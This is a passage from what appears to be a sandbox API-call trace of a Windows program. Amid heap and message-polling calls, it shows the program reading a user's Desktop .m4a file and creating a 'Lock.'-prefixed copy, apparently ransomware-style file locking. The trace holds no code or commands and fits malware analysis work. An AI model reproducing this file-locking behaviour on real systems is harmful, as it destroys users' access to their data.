lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0165.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0165.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0165.907] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.907] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.907] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.907] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/GyHm6iovQDw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyhm6iovqdw.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0165.908] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.908] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0165.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0165.909] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.909] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.909] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0165.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0165.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.GyHm6iovQDw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.gyhm6iovqdw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0165.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0165.910] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0165.910] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.910] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0165.910] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0165.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0165.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.910] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0165.911] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0165.913] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x36a0, lpOverlapped=0x0) returned 1 [0165.913] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0165.915] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0165.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x136a0) returned 0x24d7a58 [0165.915] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0165.916] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0165.916] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0165.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0165.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x136a0) returned 0x24d7a58 [0165.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2658 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x136a0) returned 0x34c58f8 [0165.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0165.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0165.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0165.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0165.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0165.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0165.919] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.920] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0165.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.920] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.920] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0165.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0165.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.921] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.922] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.922] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.923] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.923] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.923] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.923] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.923] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.924] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.924] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.924] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.924] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.924] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.924] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.924] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: 